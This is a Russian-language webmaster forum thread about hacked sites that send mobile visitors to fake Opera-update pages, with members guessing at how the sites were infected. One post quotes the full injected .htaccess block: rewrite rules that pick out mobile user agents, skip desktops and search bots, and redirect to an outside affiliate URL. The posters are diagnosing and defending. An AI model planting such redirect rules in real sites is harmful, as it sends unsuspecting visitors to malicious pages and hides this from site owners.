В каком-то из сторонних модулей вредоносный код

9.85K
.
Fublin, да
.
~XeOn~, не тема, а бомба прям..
.
Это реальная проблема. Ведь сейчас часто такая хрень начала происходить.
Кому не влом киньте адрес на который перекидывает, попробую инфу пробить.
.
~XeOn~, Вот сюда перекыдавает из коре у Пилота.
Но там думаю еще что то. У всех разные сайты. Я вобще сейчас склоняюсь к мысли, что это бизнес. Тоесь дешёвый трафик.. Всё пока указывает на хостеров, так как все грят что ихнии то хосты неприступны..
httр://орerauрdt.ru
.
Fublin (10.07.2012/10:30)
~XeOn~, Вот сюда перекыдавает из коре у Пилота.
Но там думаю еще что то. У всех разные сайты. Я вобще сейчас склоняюсь к мысли, что это бизнес. Тоесь дешёвый трафик.. Всё пока указывает на хостеров,
Прикольно. С компа на тот сайт не пускает, а в Гугле нету ни одного упоминания.
.
(\/)____o_O____(\/)
пароли поменял, а так вроде дыр нет, тем более в корень хоста кинуть файл сложно, если он за пределами пхп корня находиться, либо фтп подобрали, либо хост
.
Sensus veris
Почитала немного про эту каку. Вот только не поняла случай с core.php
Везде пишут про то, что изменен .htaccess или в ява скрипте.
.
Sensus veris
Onatolich (10.07.2012/10:32)
Прикольно. С компа на тот сайт не пускает, а в Гугле нету ни одного упоминания.
Прям уж ни одного? )
С 4pda
Если телефон рутован, то это последствия вирусни (точнее вреданосной программы), сам "вирус" мог быть удален, но он успел модифицировать файл hosts. Советую проверить систему на вирусы (но не факт, что он что-то найдет, при этом вредонос может еще оставаться в системе), зайти в приложение superuser , изменить автоматический ответ на "спрашивать", там же, в списке программ желательно удалить все, которым уже розданы разрешения. Затем установить любую программу-банерорезку (adfree) с помощью нее восстановить оригинальный файл host и применить обновления.
Так же возможна ситуация с указанием левого dns, если вышеперечисленное не поможет. Надо покапать в ту сторону.
Все, что выше относится только к рутованному телефону, если он без рута, то проще сбросить настройки на заводские, если не жалко. Иначе придется искать вредоноса через диспетчера задач - скорее всего это одна из недавно установленных программ

сейчас пришло в голову, что я ступанул с механизмом заражения сайтов, поторопился все поздним вечером за раз сделать...
склоняюсь к заражению пхп кода файлов, возможно, что путей/механизмов заражения сайта несколько...
в общем вопрос пока открытым остается...

http://www.anti-malware.ru/for ... .html
.
Sensus veris
Lestat (10.07.2012/11:01)
Libra, Лен, а вот теперь вспомни скрины что тебе кидал с твоего сайта и с сайта Флая. Там тоже был какой то код, но ты не предала тогда значения этому
Там разве что-то связанное с оперой было? Уже не понмню... Но в любом случае я тогда и htaccess смотрела, и еще несколько файлов, но все чисто было.
.
Pillott
Enter нажат, к чему теперь рыданья…
~XeOn~ (10.07.2012/10:20)
Кому не влом киньте адрес на который перекидывает, попробую инфу пробить.
Откопал свою старую переписку с тех.поддержкой, там где я им писал о редиректе в .htaccess который нашел. Вот смотри внизу в самом конце, это же чья-то конкретная рекламная ссылка с Id ?
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} ^.*(acs|alav|alca|amoi|audi|aste|avan|benq|bird|blac).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(blaz|brew|cell|cldc|cmd\-|dang|doco|eric|hipt|inno|ipaq|java).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(jigs|kddi|keji|leno|lg\-c|lg\-d|lg\-g|lge\-|maui|maxo|midp|mits|mmef|mobi).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(mot\-|moto|mwbp|nec\-|newt|noki|opwv|palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(qwap|sage|sams|sany|sch\-|sec\-|send|seri|sgh\-|shar|sie\-|siem|smal|smar|sony).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(sph\-|symb|t\-mo|teli|tim\-|tosh|tsm\-|upg1|upsi|vk\-v|voda|w3cs|wap\-|wapa|wapi|wapp).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(wapr|webc|winw|winw|xda|xda\-|up.browser|up.link|windows.ce|iemobile|mini|mmp|symbian).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(midp|wap|phone|pocket|mobile|android|Android|pda|PPC|Series60|Opera.Mini|Moby|Mobi).* [NC,OR]
RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} !ipad [NC]
RewriteCond %{HTTP_USER_AGENT} !iphone [NC]
RewriteCond %{HTTP_USER_AGENT} !iPad [NC]
RewriteCond %{HTTP_USER_AGENT} !iPhone [NC]
RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC]
RewriteCond %{HTTP_USER_AGENT} !bsd [NC]
RewriteCond %{HTTP_USER_AGENT} !x11 [NC]
RewriteCond %{HTTP_USER_AGENT} !unix [NC]
RewriteCond %{HTTP_USER_AGENT} !macos [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !playstation [NC]
RewriteCond %{HTTP_USER_AGENT} !google [NC]
RewriteCond %{HTTP_USER_AGENT} !yandex [NC]
RewriteCond %{HTTP_USER_AGENT} !bot [NC]
RewriteCond %{HTTP_USER_AGENT} !libwww [NC]
RewriteCond %{HTTP_USER_AGENT} !msn [NC]
RewriteCond %{HTTP_USER_AGENT} !america [NC]
RewriteCond %{HTTP_USER_AGENT} !avant [NC]
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !fdm [NC]
RewriteCond %{HTTP_USER_AGENT} !maui [NC]
RewriteCond %{HTTP_USER_AGENT} !webmoney [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
RewriteRule ^(.*)$ httр://oper0me.com/?a=03d4t254z4y2x4t2w4v2t2t2y3s2x434x2x264x284035403e4 [L,R=302]
Всего: 467